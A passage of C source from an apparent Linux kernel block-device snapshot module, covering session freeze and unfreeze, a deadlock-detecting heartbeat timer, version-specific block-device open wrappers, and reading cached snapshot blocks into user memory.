#endif
{
	struct session_struct *s;
	int ioctls;

#ifdef HAVE_INIT_TIMER
	s = (struct session_struct *) __data;
#else
	s =  from_timer(s, t, s_timer);
#endif
	ioctls = atomic_read(&s->s_pid_info->sn_ioctls);
	if (!s->s_heartbeat_active || ioctls != s->s_ioctlcnt_prev) {
		sa_debug(DEBUG_API, "s=%p(%x) %d %u %u %u\n", s, s->s_kdev,
			s->s_heartbeat_active,
			ioctls, s->s_ioctlcnt_prev, s->s_ioctlcnt);
		if (s->s_heartbeat_active)
			mod_timer(&s->s_timer, jiffies + TIMER_INTERVAL);
		s->s_ioctlcnt_prev = ioctls;
		return;
	}
	sa_info("Deadlock detected.dev=%x, cnt=%d, state=%d. Unfreezing...\n",
			s->s_kdev, ioctls, s->s_state);
	sn_set_mb(s->s_state, SNAP_DEADLOCK_ERR);
#ifndef USE_KERNEL_THREAD
	wake_up_process(resolver_thread);
#else
	wake_up_interruptible(&resolver_thread_signal);
#endif
}

static void sa_heartbeat_stop(struct session_struct *s)
{
	spin_lock_bh(&s->s_misc_lock);
	s->s_heartbeat_active = 0;
	spin_unlock_bh(&s->s_misc_lock);
	if (s->s_timer.function) {
		del_timer_sync(&s->s_timer);
		s->s_timer.function = NULL;
	}
}

static void sa_heartbeat_start(struct session_struct *s)
{
	spin_lock_bh(&s->s_misc_lock);
	s->s_heartbeat_active = 1;
	s->s_ioctlcnt_prev = atomic_read(&s->s_pid_info->sn_ioctls);
#ifdef HAVE_INIT_TIMER
	init_timer(&s->s_timer);
	s->s_timer.function = &heartbeat_timer_func;
	s->s_timer.data = (unsigned long) s;
#else
	timer_setup(&s->s_timer, heartbeat_timer_func, 0);
#endif
	s->s_timer.expires = jiffies + TIMER_INTERVAL;
	add_timer(&s->s_timer);
	spin_unlock_bh(&s->s_misc_lock);
}

static int validate_kernel_version(void)
{
#ifdef HAVE_BDOPS_SUBMIT_BIO
	if (strncmp(UTS_RELEASE, utsname()->release, strlen(UTS_RELEASE)) != 0)
		return 1;
#endif
	return 0;
}

static int session_freeze(struct session_struct *s)
{
	int ret;
	sn_request_queue *q;

	ret = -EINVAL;
	sa_debug(DEBUG_API, "s=%p(%x)\n", s, s->s_kdev);

#ifdef HAVE_BDOPS_SUBMIT_BIO
	if (validate_kernel_version() != 0) {
		printk(KERN_ERR "snapapi26 module was built for another kernel, have %s expecting %s. Exiting...", utsname()->release, UTS_RELEASE);
		return -ENXIO;
	}
#endif
	q = NULL;
	down(&s->s_sem);

	if (s->s_make_request_fn || s->s_queue_mq_based || s->s_state != SNAP_INITED)
		goto out_up;
/* sync !!! */
	sn_freeze_bdev(s);
	if (!s->s_sb) {
		sa_debug(DEBUG_INTERNALS, "Can't find super, dev %x, freeze.\n", s->s_kdev);
#if 0
		sa_warn("Can't find super, device %x, freeze.\n", s->s_kdev);
		sn_set_mb(s->s_state, SNAP_FREEZE_ERR);
		ret = -ESRCH;
		goto out_up;
#endif
	}
	sn_set_mb(s->s_state, SNAP_FREEZING);
	if (register_make_request(s)) {
		sa_warn("Device %x does not have a queue.\n", s->s_kdev);
		sn_set_mb(s->s_state, SNAP_FREEZE_ERR);
		sn_thaw_bdev(s);
		goto out_up;
	}
/* The queue exists. It has been checked in register_make_request */
	q = snapapi_get_dev_queue(s);
	set_current_state(TASK_UNINTERRUPTIBLE);
#if defined (HAVE_REQUEST_QUEUE_RQS) || defined (HAVE_REQUEST_LIST_COUNT)
	do {
#ifdef HAVE_REQUEST_QUEUE_RQS
		const int rq_cnt = q->nr_rqs[WRITE];
#else
		const int rq_cnt = q->rq.count[WRITE];
#endif
		if (rq_cnt == 0)
			break;
		schedule_timeout(HZ / 20);
		sa_debug(DEBUG_INTERNALS, "count=%d, nr_requests=%lu\n",
			rq_cnt, q->nr_requests);
	} while (1);
#endif /* HAVE_REQUEST_QUEUE_RQS || HAVE_REQUEST_LIST_COUNT */
#ifdef HAVE_UNDERLINE_STATE
	current->__state = TASK_RUNNING;
#else
	current->state = TASK_RUNNING;
#endif
	sn_set_mb(s->s_state, SNAP_FROZEN);

	sa_heartbeat_start(s);
	ret = 0;

out_up:
	up(&s->s_sem);
	return ret;
}

static int session_unfreeze(struct session_struct *s)
{
	int ret;

	sa_debug(DEBUG_API, "s=%p(%x)\n", s, s->s_kdev);
	ret = -EINVAL;
	down(&s->s_sem);
	if (s->s_state != SNAP_FROZEN && s->s_state != SNAP_FREEZE_ERR)
		goto out_up;
	up(&s->s_sem);
	ret = 0;
	close_session(s, 0);
	return ret;

out_up:
	up(&s->s_sem);
	return ret;
}

static void session_stat(struct sn_state *sn)
{
	sa_warn("dev=%x:%x state=%d blksize=%d mmapsize=%d\n",
		sn->major, sn->minor, sn->state, sn->blksize, sn->mmapsize);
	sa_warn("psize=%llu pstrt=%llu mshft=%d ioctls=%u\n",
		sn->partsize, sn->partstrt, sn->minorshft, sn->ioctlcnt);
	sa_warn("bhpgs=%d bhcnt=%d abhs=%llu fbhs=%llu dbhs=%llu\n",
		sn->bhpages, sn->bhcount, sn->abhs, sn->fbhs, sn->dbhs);

	sa_warn("gpgs=%llu ppgs=%llu emmax=%d emmin=%d emcur=%d cached=%d\n",
		sn->gpages, sn->ppages, sn->emmax, sn->emmin, sn->emcur,
		sn->cachepages);

	sa_warn("rblk=%llu cblk=%llu rcblk=%llu rc2blk=%llu mcblk=%llu"
		" rwcolls=%llu\n", sn->rblocks, sn->cblocks,
		sn->rcblocks, sn->rc2blocks, sn->mcblocks, sn->rwcolls);

	sa_warn("sync=%u async=%u aretr=%u mipr=%u iprcnt=%u\n",
		sn->sync_req, sn->async_req, sn->async_retr,
		sn->mipr, sn->iprcnt);
	sa_warn("mbio=%u ioctlcnt=%u ioctlpid=%u\n",
		sn->mbio, sn->ioctlcnt, sn->ioctlpid);

	sa_warn("rccalls=%llu maxrcdepth=%llu rcdepthcnts=(%llu, %llu, %llu, %llu)\n",
		sn->rccalls, sn->maxrcdepth,
		sn->rcdepthcnt[0], sn->rcdepthcnt[1], sn->rcdepthcnt[2], sn->rcdepthcnt[3]);
	sa_warn("flags=%llu\n", sn->flags);
}

static void fill_state(struct session_struct *s, struct sn_state *out)
{
	out->state = s->s_state;
	out->major = MAJOR(s->s_kdev);
	out->minor = MINOR(s->s_kdev);
	out->blksize = s->s_bsize;
	out->mmapsize = s->s_maxmsize * PAGE_SIZE;

	out->partstrt = s->s_pstart;
	out->minorshft = 0;
	out->partsize = s->s_plen;

	out->bhpages = s->s_biopages;
	out->bhcount = s->s_biocount;
	out->emmax = snap_emergency_size;
	out->emmin = s->s_blkcache_emmin;
	out->emcur = s->s_blkcache_empages;
	out->cachepages = s->s_blkcache_pages;

	out->gpages = read_get_pages(s);
	out->ppages = read_put_pages(s);
	out->abhs = s->s_abios;
	out->fbhs = s->s_fbios;
	out->dbhs = s->s_dbios;
	out->rblocks = s->s_rblocks;
	out->cblocks = s->s_cblocks;
	out->rcblocks = s->s_rcblocks;
	out->fcblocks = s->s_fcblocks;
	out->mcblocks = s->s_mcblocks;
	out->rwcolls = s->s_rwcolls;
	out->rc2blocks = s->s_rc2blocks;
	out->sync_req = s->s_sync_req;
	out->mipr = s->s_mipr;
	out->async_req = s->s_async_req;
	out->iprcnt = s->s_iprcnt;
	out->async_retr = s->s_async_retr;
	out->mbio = s->s_mbio;
	out->ioctlcnt = s->s_ioctlcnt;
	out->ioctlpid = s->s_pid_info ? atomic_read(&s->s_pid_info->sn_ioctls) : 0;
	out->version =  (SNAPAPI_VMAJOR << 16) + (SNAPAPI_VMINOR << 8) +
							SNAPAPI_VSUBMINOR;

	out->extrasize = sizeof(struct sn_state) - offsetof(struct sn_state, extrasize);
	out->rccalls = s->s_rccalls;
	out->maxrcdepth = s->s_maxrcdepth;
	out->rcdepthcnt[0] = s->s_rcdepthcnt[0];
	out->rcdepthcnt[1] = s->s_rcdepthcnt[1];
	out->rcdepthcnt[2] = s->s_rcdepthcnt[2];
	out->rcdepthcnt[3] = s->s_rcdepthcnt[3];
	out->flags = 0;
	if (validate_kernel_version() != 0)
		out->flags |= KERNEL_NOT_MATCHED;
}

static int session_state(struct session_struct *s, struct sn_state *state,
						unsigned int size)
{
	int ret;
	struct sn_state out;

	sa_debug(DEBUG_API, "s=%p, state=%p\n", s, state);
	fill_state(s, &out);
	if (size > sizeof(out))
		size = sizeof(out);
	ret = copy_to_user(state, &out, size);
	if (ret)
		return -EACCES;
	return 0;
}

#if 0
static void dump_sessions(void)
{
	struct session_struct *s;
	sa_warn("Start sessions dump\n");
	list_for_each_entry(s, &sessions_list, s_list) {
		sa_warn("dev=%x:%x state=%u blksize=%u mmapsize=%d queue=%p\n",
			MAJOR(s->s_kdev), MINOR(s->s_kdev), s->s_state,
			s->s_bsize,  (int)(s->s_maxmsize * PAGE_SIZE),
			s->s_request_queue);
		sa_warn("psize=%llu pstrt=%llu mshft=%d ioctls=%d\n",
			s->s_plen, s->s_pstart, 0, s->s_ioctlcnt);
		sa_warn("bhpgs=%d bhcnt=%d abhs=%llu fbhs=%llu dbhs=%llu\n",
			s->s_biopages, s->s_biocount, s->s_abios, s->s_fbios,
			s->s_dbios);
		sa_warn("gpgs=%llu ppgs=%llu emmax=%d emmin=%d emcur=%d"
			" cached=%d\n", read_get_pages(s), read_get_pages(s),
			snap_emergency_size, s->s_blkcache_emmin,
			s->s_blkcache_empages, s->s_blkcache_pages);
		sa_warn("rblk=%llu cblk=%llu rcblk=%llu rc2blk=%llu mcblk=%llu"
			" rwcolls=%llu\n", s->s_rblocks, s->s_cblocks,
			s->s_rcblocks, s->s_rc2blocks, s->s_mcblocks,
			s->s_rwcolls);
	}
	sa_warn("End of sessions dump\n");
}
#endif

#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,15)
#define _READS ios[0]
#define _WRITES ios[1]
#define _READ_SECTORS sectors[0]
#define _WRITE_SECTORS sectors[1]
#else
#define _READS reads
#define _WRITES writes
#define _READ_SECTORS read_sectors
#define _WRITE_SECTORS write_sectors
#endif

#ifdef HAVE_BDEV_FILE_OPEN_BY_DEV

#define USE_BDEV_FILE

#elif defined(HAVE_BDEV_OPEN_BY_DEV)

#define USE_BDEV_HANDLE

#elif defined(HAVE_BLKDEV_GET_BY_DEV)

#ifdef HAVE_BLKDEV_GET_BY_DEV_USE_FMODE
#define USE_BDEV_BLOCK_DEV_FMODE
#else
#define USE_BDEV_BLOCK_DEV_BLK_MODE
#endif

#else

#define USE_BDGET

#endif

#ifdef USE_BDEV_FILE
/* kernel 6.9.x */
#define BLKDEV_GET_MODE_EXCL (BLK_OPEN_READ | BLK_OPEN_WRITE)
#define BLKDEV_GET_MODE_SHARED BLK_OPEN_READ

static struct block_device *sn_blkdev_get_by_dev(dev_t kdev, fmode_t mode, void *holder, void** container)
{
	struct block_device *bdev;

	sa_debug(DEBUG_API, "Start kdev=%x mode=%d holder=%p container=%p\n", kdev, (int) mode, holder, container);
	struct file *fp = bdev_file_open_by_dev(kdev, mode, holder, NULL);
	if (IS_ERR(fp)) {
		return NULL;
	}
	bdev = file_bdev(fp);
	*container = fp;
	sa_debug(DEBUG_API, "OK kdev=%x bdev=%p\n", kdev, bdev);
	return bdev;
}

static void sn_blkdev_put_by_dev(struct block_device* bdev, fmode_t mode, void* holder, void* container)
{
	sa_debug(DEBUG_API, "Start bdev=%p mode=%d holder=%p container=%p\n", bdev, (int) mode, holder, container);
	fput((struct file*) container);
}
#endif

#ifdef USE_BDEV_HANDLE
/* kernel 6.6-6.8 */
#define BLKDEV_GET_MODE_EXCL (BLK_OPEN_READ | BLK_OPEN_WRITE)
#define BLKDEV_GET_MODE_SHARED BLK_OPEN_READ

static struct block_device *sn_blkdev_get_by_dev(dev_t kdev, fmode_t mode, void *holder, void** container)
{
	struct block_device *bdev;

	sa_debug(DEBUG_API, "Start kdev=%x mode=%d holder=%p container=%p\n", kdev, (int) mode, holder, container);
	struct bdev_handle *handle = bdev_open_by_dev(kdev, mode, holder, NULL);
	if (IS_ERR(handle)) {
		return NULL;
	}
	bdev = handle->bdev;
	*container = handle;
	sa_debug(DEBUG_API, "OK kdev=%x bdev=%p\n", kdev, bdev);
	return bdev;
}

static void sn_blkdev_put_by_dev(struct block_device* bdev, fmode_t mode, void* holder, void* container)
{
	sa_debug(DEBUG_API, "Start bdev=%p mode=%d holder=%p container=%p\n", bdev, (int) mode, holder, container);
	bdev_release((struct bdev_handle *)container);
}
#endif

#ifdef USE_BDEV_BLOCK_DEV_BLK_MODE
/* kernel 6.5 */
#define BLKDEV_GET_MODE_EXCL (BLK_OPEN_READ | BLK_OPEN_WRITE)
#define BLKDEV_GET_MODE_SHARED BLK_OPEN_READ

static struct block_device *sn_blkdev_get_by_dev(dev_t kdev, fmode_t mode, void *holder, void** container)
{
	struct block_device *bdev;

	sa_debug(DEBUG_API, "Start kdev=%x mode=%d holder=%p container=%p\n", kdev, (int) mode, holder, container);
	bdev = blkdev_get_by_dev(kdev, mode, holder, NULL);
	if (IS_ERR(bdev)) {
		return NULL;
	}
	sa_debug(DEBUG_API, "OK kdev=%x bdev=%p\n", kdev, bdev);
	return bdev;
}

static void sn_blkdev_put_by_dev(struct block_device* bdev, fmode_t mode, void* holder, void* container)
{
	sa_debug(DEBUG_API, "Start bdev=%p mode=%d holder=%p container=%p\n", bdev, (int) mode, holder, container);
	blkdev_put(bdev, holder);
}
#endif

#ifdef USE_BDEV_BLOCK_DEV_FMODE
/* kernel 3.19-6.4 */
#define BLKDEV_GET_MODE_EXCL (FMODE_READ | FMODE_WRITE | FMODE_EXCL)
#define BLKDEV_GET_MODE_SHARED FMODE_READ

static struct block_device *sn_blkdev_get_by_dev(dev_t kdev, fmode_t mode, void *holder, void** container)
{
	struct block_device *bdev;

	sa_debug(DEBUG_API, "Start kdev=%x mode=%d holder=%p container=%p\n", kdev, (int) mode, holder, container);
	bdev = blkdev_get_by_dev(kdev, mode, holder);
	if (IS_ERR(bdev)) {
		return NULL;
	}
	sa_debug(DEBUG_API, "OK kdev=%x bdev=%p\n", kdev, bdev);
	return bdev;
}

static void sn_blkdev_put_by_dev(struct block_device* bdev, fmode_t mode, void* holder, void* container)
{
	sa_debug(DEBUG_API, "Start bdev=%p mode=%d holder=%p container=%p\n", bdev, (int) mode, holder, container);
#ifdef HAVE_BLKDEV_GET_BY_DEV_HOLDER
	blkdev_put(bdev, holder);
#else
	blkdev_put(bdev, mode);
#endif
}
#endif

#ifdef USE_BDGET
#ifndef FMODE_EXCL
#define FMODE_EXCL 0
#endif
#define BLKDEV_GET_MODE_EXCL (FMODE_READ | FMODE_WRITE | FMODE_EXCL)
#define BLKDEV_GET_MODE_SHARED FMODE_READ

static int sn_blkdev_get(struct block_device *bdev, fmode_t mode, void *holder)
{
#ifdef HAVE_BLKDEV_GET_3ARG_FLAG
	return blkdev_get(bdev, mode, (unsigned)holder); /* up to 2.6.28 kernels */
#elif defined(HAVE_BLKDEV_GET_3ARGS)
	return blkdev_get(bdev, mode, holder); /* since 2.6.38 kernels */
#else
	return blkdev_get(bdev, mode); /* ~2.6.28 to 2.6.37 kernels */
#endif
}

static MAKE_BLKDEV_RETURN_VALUE sn_blkdev_put(struct block_device *bdev, fmode_t mode, void *holder)
{
#ifdef HAVE_BLKDEV_PUT_2ARGS
#ifdef HAVE_BLKDEV_PUT_HOLDER
	return blkdev_put(bdev, holder);
#else
	return blkdev_put(bdev, mode);
#endif /* HAVE_BLKDEV_PUT_HOLDER */
#else  /* HAVE_BLKDEV_PUT_2ARGS */
	return blkdev_put(bdev);
#endif /* HAVE_BLKDEV_PUT_2ARGS */
}

static struct block_device *sn_blkdev_get_by_dev(dev_t kdev, fmode_t mode, void *holder, void **container)
{
	struct block_device *bdev;
	int ret;

	sa_debug(DEBUG_API, "Start kdev=%x mode=%d holder=%p\n", kdev, (int) mode, holder);
	bdev = bdget(kdev);
	if (!bdev)
		return NULL;
	if ((ret = sn_blkdev_get(bdev, mode, holder)) < 0)
		return NULL;
	sa_debug(DEBUG_API, "bd_part=%p bd_contains=%p\n", bdev->bd_part,
			bdev->bd_contains);
	sa_debug(DEBUG_API, "OK kdev=%x bdev=%p\n", kdev, bdev);
	return bdev;
}


static void sn_blkdev_put_by_dev(struct block_device * bdev, fmode_t mode, void* holder, void *container)
{
	sa_debug(DEBUG_API, "Start bdev=%p mode=%d holder=%p\n", bdev, (int) mode, holder);
	sn_blkdev_put(bdev, mode, holder);
}

#endif /* HAVE_BDGET */

static int session_devinfo(struct session_struct *s, dev_t kdev,
				struct sn_devinfo *info, unsigned int size)
{
	int ret;
	struct sn_devinfo out;
	struct super_block * sb;
	struct block_device *bdev;
	void *bdev_container;

	sa_debug(DEBUG_API, "s=%p, devinfo=%p\n", s, info);
	bdev_container = 0;
	memset(&out, 0,sizeof(out));
	out.major = MAJOR(kdev);
	out.minor = MINOR(kdev);
	/* sharing mode - can use 0 as holder */
	bdev = sn_blkdev_get_by_dev(kdev, BLKDEV_GET_MODE_SHARED, NULL, &bdev_container);
	if (!bdev)
		return -ENODEV;
	out.partstrt = get_start_sect(bdev);
#ifdef HAVE_BDEV_IS_PARTITION
	if (bdev_is_partition(bdev)) {
#else
	if (bdev->bd_part) {
#endif
#ifdef HAVE_BDEV_NR_SECTORS
		out.partsize = bdev_nr_sectors(bdev);
#else
		out.partsize = bdev->bd_part->nr_sects;
#endif
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,25)
#ifndef HAVE_BD_PART
		out.reads = part_stat_read(bdev, _READS);
		out.read_sectors = part_stat_read(bdev, _READ_SECTORS);
		out.writes = part_stat_read(bdev, _WRITES);
		out.write_sectors = part_stat_read(bdev, _WRITE_SECTORS);
#else
		out.reads = part_stat_read(bdev->bd_part, _READS);
		out.read_sectors = part_stat_read(bdev->bd_part, _READ_SECTORS);
		out.writes = part_stat_read(bdev->bd_part, _WRITES);
		out.write_sectors = part_stat_read(bdev->bd_part, _WRITE_SECTORS);
#endif /*HAVE_BD_PART*/
#else
		out.reads = bdev->bd_part->_READS;
		out.read_sectors = bdev->bd_part->_READ_SECTORS;
		out.writes = bdev->bd_part->_WRITES;
		out.write_sectors = bdev->bd_part->_WRITE_SECTORS;
#endif
	} else if (bdev->bd_disk) {
		out.partsize = get_capacity(bdev->bd_disk);
#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,28)
		out.reads = disk_stat_read(bdev->bd_disk, _READS);
		out.read_sectors = disk_stat_read(bdev->bd_disk, _READ_SECTORS);
		out.writes = disk_stat_read(bdev->bd_disk, _WRITES);
		out.write_sectors = disk_stat_read(bdev->bd_disk, _WRITE_SECTORS);
#else
#ifndef HAVE_BD_PART
		out.reads = part_stat_read(bdev, _READS);
		out.read_sectors = part_stat_read(bdev, _READ_SECTORS);
		out.writes = part_stat_read(bdev, _WRITES);
		out.write_sectors = part_stat_read(bdev, _WRITE_SECTORS);
#else
		out.reads = part_stat_read(&bdev->bd_disk->part0, _READS);
		out.read_sectors = part_stat_read(&bdev->bd_disk->part0, _READ_SECTORS);
		out.writes = part_stat_read(&bdev->bd_disk->part0, _WRITES);
		out.write_sectors = part_stat_read(&bdev->bd_disk->part0, _WRITE_SECTORS);
#endif /*HAVE_BD_PART*/
#endif
	}
	else
		sa_warn("Can't detect device %x size.\n", kdev);
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,15)
	sb = sn_get_super(bdev);
#else
	sb = user_get_super(kdev);
#endif
	sn_blkdev_put_by_dev(bdev, BLKDEV_GET_MODE_SHARED, NULL, bdev_container);
	if (sb) {
		out.blksize = sb->s_blocksize;
		sn_drop_super(sb);
	}
	if (size > sizeof(out))
		size = sizeof(out);
	ret = copy_to_user(info, &out, size);
	if (ret)
		return -EACCES;
	return 0;
}

static int session_getbno(struct session_struct *s, unsigned long long *data)
{
	unsigned long long bno;
	int err;

	if (!s->s_blkmap.blkmap || s->s_state != SNAP_MAPPED) {
		sa_warn("session_getbno failed. state=%d\n", s->s_state);
		return -EINVAL;
	}
	down(&s->s_sem);
	bno = any_block_in_cache(s);
	up(&s->s_sem);
	sa_debug(DEBUG_BREAD, "s=%p, bno=%llu\n", s, bno);
	err = put_user(bno, data);
	if (err)
		sa_warn("session_getbno failed. err=%d\n", err);

	return err;
}

static int session_rdcache(struct session_struct *s, struct sn_rdcache *req,
						unsigned int size)
{
	int ret;
	struct sn_rdcache rdc;
	struct page * page;
	unsigned int max_blocks;
	char *data;
	unsigned long long bno;
	unsigned int i;

	sa_debug(DEBUG_API, "s=%p, req=%p\n", s, req);
	if (!s->s_blkmap.blkmap || s->s_state != SNAP_MAPPED)
		return -EINVAL;
	page = alloc_page(GFP_KERNEL);
	if (!page)
		return -ENOMEM;
	memset(&rdc, 0, sizeof(rdc));
	if (size > sizeof(rdc))
		size = sizeof(rdc);
	ret = copy_from_user(&rdc, req, size);
	if (ret || rdc.buf == 0 || rdc.size == 0) {
		page_cache_release(page);
		return  -EACCES;
	}
	down(&s->s_sem);
	rdc.bno = any_block_in_cache(s);
	if (rdc.bno == ~0ULL)
		goto out_up;
	max_blocks = rdc.size / s->s_bsize;
	data = rdc.buf;
	bno = rdc.bno;
	for (i = 0; i < max_blocks; i++, bno++, data += s->s_bsize) {
		ret = sa_cache_read(s, page_address(page), bno,
				READ_KERNEL1, SNAP_READ_ONCE);
		if (!ret)
			break;
		ret = copy_to_user(data, page_address(page), s->s_bsize);
		if (ret) {
			ret = -EACCES;
			break;
		}
		s->s_rc2blocks++;
	}
	rdc.count = bno - rdc.bno;
out_up:
	up(&s->s_sem);
	page_cache_release(page);
	if (ret)
		return ret;
	ret = copy_to_user(req, &rdc, size);
	if (ret)
		return -EACCES;
	sa_debug(DEBUG_BREAD, "s=%p, bno=%llu count=%u\n", s, rdc.bno, rdc.count);
	return 0;
}

static int session_bfree(struct session_struct *s, unsigned long long bno,
				unsigned long long count)
{
	int ret;
	unsigned long long end;

	ret = -EINVAL;
	sa_debug(DEBUG_BREAD, "s=%p, bno=%llu, count=%llu\n", s, bno, count);
	down(&s->s_sem);
	if (!s->s_blkmap.blkmap)
		goto out;
	end = bno + count;
	if (end < bno || end > s->s_blkmap.size)
		goto out;
	if (s->s_state != SNAP_MAPPED)
		goto out;

	for (; count; bno++, count--) {
		if (clear_block_in_map(&s->s_blkmap, bno) == 0)
			sa_cache_read(s, NULL, bno, FAKE_READ, SNAP_READ_ONCE);
	}
	ret = 0;

out:
	up(&s->s_sem);
	return ret;
}

static inline char * bread_data_addr(struct session_struct *s, int i)
{
	if (s->s_bppage == 1)
		return page_address(s->s_mpages[i]);
	return ((char *)page_address(s->s_mpages[i / s->s_bppage]) +
			(i % s->s_bppage) * s->s_bsize);
}

static void bread_submit_bios(struct session_struct *s,
		unsigned long long bno, int count)
{
	struct bio *bio;
	struct page *page;
	int i, k;
	int vecs, page_idx, last_len;

	i = 0;
	page_idx = 0;
	last_len = count % s->s_bppage;
	s->s_rblocks += count;

	while (count > 0) {
repeat:
		vecs = sn_round(count, s->s_bppage);
#ifndef HAVE_BIO_ALLOC_2ARGS
		bio = bio_alloc(s->s_bdev, vecs, 0, GFP_NOIO);
#else
		bio = bio_alloc(GFP_NOIO, vecs);
#endif
		if (!bio) {
			schedule();
			goto repeat;
		}
		s->s_abios++;
#ifdef HAVE_BIO_ALLOC_2ARGS
#ifndef HAVE_BIO_SET_DEV
		bio->bi_bdev = s->s_bdev;
#else
		bio_set_dev(bio,s->s_bdev);
#endif
#endif

#ifdef HAVE_BVEC_ITER
		bio->bi_iter.bi_sector = ((sector_t) bno) * s->s_spb;
#else
		bio->bi_sector = ((sector_t) bno) * s->s_spb;
#endif
		init_completion(&s->s_local_bios[i].event);
		bio->bi_private = &s->s_local_bios[i].event;
		bio->bi_end_io = sa_cache_bio_end_io;

		for (k = 0; k < vecs; k++) {
			int vec_len = PAGE_SIZE;
			page = s->s_mpages[page_idx];
			if (count == last_len)
				vec_len = last_len * s->s_bsize;
			if (bio_add_page(bio, page, vec_len, 0) < vec_len)
				break;
			count -= vec_len / s->s_bsize;
			page_idx++;
		}
		s->s_local_bios[i].bio = bio;
		bno += sn_bio_bi_size(bio) / s->s_bsize;
		sn_submit_bio(READ, bio);
		i++;
	}
}

static int bread_from_cache(struct session_struct *s, unsigned long long bno,
		unsigned int count, unsigned int flags)
{
	int i, numread, ret;

	sa_debug(DEBUG_BREAD, "s=%p, bno=%llu, count=%u\n",
					s, bno, count);
	numread = 0;
	for (i = 0; i < count; i++, bno++) {
		char * data;

		data = bread_data_addr(s, i);
		ret = sa_cache_read(s, data, bno, READ_KERNEL1, flags);
		if (ret)
			numread++;
	}
	return numread;
}

static int bread_wait_submitted(struct session_struct *s,
				unsigned long long bno, unsigned int count)
{
	int i, ret;
	int reqs;

	ret = 0;
	reqs = s->s_msize;
	for (i = 0; i < reqs; i++) {
		if (!s->s_local_bios[i].bio)
			continue;
		wait_for_completion(&s->s_local_bios[i].event);
		if (sn_is_error_bio(s->s_local_bios[i].bio))
			ret = -EIO;
	}
	return ret;
}

#if 0
static inline void dump_data(void *data, int offset, char *pref)
{
	unsigned char *p = (unsigned char *)data + offset;
	sa_debug(DEBUG_BREAD, "%s %x:%x %x %x %x %x %x %x %x %x %x %x %x %x"
		" %x %x %x\n",
		pref, offset,
		*p, *(p+1), *(p+2), *(p+3), *(p+4), *(p+5), *(p+6), *(p+7),
		*(p+8), *(p+9), *(p+10), *(p+11), *(p+12), *(p+13), *(p+14),
		*(p+15));
}
#endif
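/*
 * Fast-path read into the session's mmap()'ed pages: submit read bios
 * for the whole range, wait for them, then overlay the blocks that are
 * present in the snapshot cache (presumably the frozen-time versions).
 * With SNAP_READ_ONCE the blocks are also dropped from the block map
 * so they are not copied again. Note that this drops s_sem, which was
 * taken by the caller.
 */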
static int session_bread_fast(struct session_struct *s, unsigned long long bno,
			unsigned int count, unsigned int flags,
			unsigned long long *bincache)
{
	int ret, ccnt, i;
	unsigned long long cachecnt;
	unsigned int rcount;	/* saved count */
	unsigned int reqs;

	ret = ccnt = 0;
	rcount = count;

	sa_debug(DEBUG_BREAD, "s=%p, bno=%llu, count=%u\n",
					s, bno, count);
	if (bno + count > (s->s_plen >> s->s_spbshift))
		count = (s->s_plen >> s->s_spbshift) - bno;
	bread_submit_bios(s, bno, count);
	ret = bread_wait_submitted(s, bno, count);
	if (!ret) /* read from cache only requested blocks */ {
		if (flags & SNAP_READ_ONCE)
			for (i = 0; i < rcount; i++)
				clear_block_in_map(&s->s_blkmap, bno + i);
		ccnt = bread_from_cache(s, bno, rcount, flags);
	}
	reqs = s->s_msize;
	for (i = 0; i < reqs; i++) {
		if (s->s_local_bios[i].bio) {
			bio_put(s->s_local_bios[i].bio);
			s->s_local_bios[i].bio = NULL;
			s->s_fbios++;
		}
	}
	cachecnt = 0;
	if (!(flags & SNAP_READ_ONCE))
		/* wake up the user-level cache in non-SNAP_READ_ONCE mode only */
		cachecnt = s->s_cblocks - s->s_fcblocks;
	sa_debug(DEBUG_BREAD, "s=%p, bno=%llu, L=%u, R=%d, C=%d\n",
					s, bno, count, rcount, ccnt);
	sa_debug(DEBUG_CACHE, "cached=%llu, read=%llu, incache=%llu\n",
					s->s_cblocks, s->s_rcblocks, cachecnt);
/*	dump_data(page_address(s->s_mpages[0]), 0, "session_bread_fast"); */
	up(&s->s_sem);
	if (!ret && copy_to_user(bincache, &cachecnt, sizeof(cachecnt)))
		return -EACCES;
	return ret;
}

static inline int sn_page_mapcount(struct page *page)
{
#ifdef HAVE_PAGE_UMAPCOUNT
	return atomic_read(&page->_mapcount) + 1;
#elif defined(HAVE_PAGE_MAPCOUNT)
	return page_mapcount(page);
#else
	return (page->mapcount);
#endif
}

static int session_copy_to_cow(struct session_struct *s, char *data, unsigned int count)
{
	struct page **page_ref;
	int size;

	size = PAGE_SIZE;
	for (page_ref = s->s_mpages; count; data += PAGE_SIZE) {
		struct page *page;

		if (count < s->s_bppage) {
			size = count * s->s_bsize;
			count = 0;
		} else
			count -= s->s_bppage;

		page = *page_ref++;
		if (page && !sn_page_mapcount(page))
			if (copy_to_user(data, page_address(page), size))
				return -EACCES;
	}
	return 0;
}

static int session_bread(struct session_struct *s, unsigned long long bno,
			unsigned int count, char *data, unsigned int flags,
			unsigned long long *bincache)
{
	int ret;
	unsigned long long end;

	ret = -EINVAL;

	sa_debug(DEBUG_BREAD, "s=%p, bno=%llu, count=%u\n", s, bno, count);
	down(&s->s_sem);
	if (!s->s_blkmap.blkmap)
		goto out;
	end = bno + count;
	if (end < bno || end > s->s_blkmap.size)
		goto out;
	if (s->s_state != SNAP_MAPPED)
		goto out;

	if (s->s_vma && data == (char *)s->s_vma->vm_start &&
				count * s->s_bsize <= PAGE_SIZE * s->s_msize) {
		ret = session_bread_fast(s, bno, count, flags, bincache);
		/* copy data to the user's COW'ed pages, if any */
		if (!ret && s->s_vma->anon_vma)
			ret = session_copy_to_cow(s, data, count);
		return ret;
	}
	ret = -EINVAL;
	sa_warn("Interface error.%s","\n");
out:
	up(&s->s_sem);
	return ret;
}

static int session_ldmap(struct session_struct *s, unsigned long long size,
								void *map)
{
	int ret;

	ret = -EINVAL;
	sa_debug(DEBUG_API, "size=%llu\n", size);
	down(&s->s_sem);
	if (s->s_state != SNAP_FROZEN)
		goto out_up;
	sn_set_mb(s->s_state, SNAP_INITINGMAP);
#ifdef USE_VZ_VZSNAP
	if (s->s_veid) /* block_map already filled by block_map_init_vzsnap */
		ret = 0;
	else
#endif
	ret = block_map_init(s, size, map, 1);
	sa_heartbeat_stop(s);
	if (ret) {
		sn_set_mb(s->s_state, SNAP_MAP_ERR);
		goto out_unlock;
	}

	wait_for_users(s);
	sn_set_mb(s->s_state, SNAP_MAPPED);
	spin_unlock(&sessions_lock);

